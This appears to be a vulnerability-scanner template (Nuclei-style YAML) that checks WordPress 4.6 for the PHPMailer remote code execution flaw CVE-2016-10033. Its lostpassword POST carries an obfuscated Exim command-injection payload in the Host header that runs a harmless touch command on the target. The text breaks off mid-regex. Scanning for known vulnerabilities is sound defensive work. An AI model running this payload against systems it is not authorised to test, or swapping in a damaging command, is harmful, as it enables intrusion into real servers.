id: CVE-2016-10033 info: name: Wordpress 4.6 Remote Code Execution author: princechaddha severity: critical description: The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property. reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html tags: wordpress,cve,cve2016,rce classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2016-10033 cwe-id: CWE-77 requests: - raw: - |+ GET /?author=1 HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - |+ POST /wp-login.php?action=lostpassword HTTP/1.1 Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) Accept: */* Content-Type: application/x-www-form-urlencoded wp-submit=Get+New+Password&redirect_to=&user_login={{username}} unsafe: true extractors: - type: regex name: username internal: true group: 1 part: body regex: - 'Author:(?:[A-Za-z0-9 -\_="]+)?